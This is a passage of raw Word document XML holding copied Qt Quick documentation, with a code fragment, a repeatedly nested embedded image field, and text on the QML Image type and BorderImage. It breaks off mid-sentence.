          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>color</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"red"</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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00112022" w:rsidRPr="00112022" w:rsidRDefault="00112022" w:rsidP="00112022">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00112022" w:rsidRPr="00112022" w:rsidRDefault="00112022" w:rsidP="00112022">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002B6E64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002B6E64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="002B6E64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CF4C26">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00CF4C26">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00CF4C26">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00B75670">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"http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1028" type="#_x0000_t75" alt="" style="width:230.4pt;height:100.8pt">
            <v:imagedata r:id="rId450" r:href="rId451"/>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00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00CF4C26">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="002B6E64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00112022" w:rsidRPr="00112022" w:rsidRDefault="00112022" w:rsidP="00E87E39">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="595" w:name="the-image-type"/>
      <w:bookmarkStart w:id="596" w:name="_Toc483000657"/>
      <w:bookmarkStart w:id="597" w:name="_Toc483003674"/>
      <w:bookmarkStart w:id="598" w:name="_Toc483604010"/>
      <w:bookmarkStart w:id="599" w:name="_Toc483605230"/>
      <w:bookmarkEnd w:id="595"/>
      <w:r w:rsidRPr="00E87E39">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Image Type</w:t>
      </w:r>
      <w:bookmarkEnd w:id="596"/>
      <w:bookmarkEnd w:id="597"/>
      <w:bookmarkEnd w:id="598"/>
      <w:bookmarkEnd w:id="599"/>
    </w:p>
    <w:p w:rsidR="00112022" w:rsidRPr="00112022" w:rsidRDefault="00490E7E" w:rsidP="00112022">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId452" w:history="1">
        <w:r w:rsidR="00112022" w:rsidRPr="00112022">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00112022" w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00112022" w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>provides an</w:t>
      </w:r>
      <w:r w:rsidR="00112022" w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId453" w:anchor="image" w:history="1">
        <w:r w:rsidR="00112022" w:rsidRPr="00112022">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Image</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00112022" w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00112022" w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">type which may be used to </w:t>
      </w:r>
      <w:r w:rsidR="00112022" w:rsidRPr="00E6532D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>display images</w:t>
      </w:r>
      <w:r w:rsidR="00112022" w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The</w:t>
      </w:r>
      <w:r w:rsidR="00112022" w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId454" w:anchor="image" w:history="1">
        <w:r w:rsidR="00112022" w:rsidRPr="00112022">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Image</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00112022" w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00112022" w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type has a</w:t>
      </w:r>
      <w:r w:rsidR="00112022" w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId455" w:anchor="source-prop" w:history="1">
        <w:r w:rsidR="00112022" w:rsidRPr="00E6532D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>source</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00112022" w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00112022" w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property whose value can be a remote or local URL, or the URL of an image file embedded in a compiled resource file.</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// This element displays an image. Because the source is online, it may take some time to fetch</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Image</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x</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40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y</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61</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73</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source</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"http://codereview.qt-project.org/static/logo_qt.png"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00112022" w:rsidRPr="00112022" w:rsidRDefault="00112022" w:rsidP="00112022">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>For more complex images there are other types similar to</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId456" w:anchor="image" w:history="1">
        <w:r w:rsidRPr="00112022">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Image</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId457" w:anchor="borderimage" w:history="1">
        <w:r w:rsidRPr="00E6532D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>BorderImage</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">draws an image with </w:t>
      </w:r>
      <w:r w:rsidRPr="00E6532D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>grid scaling</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
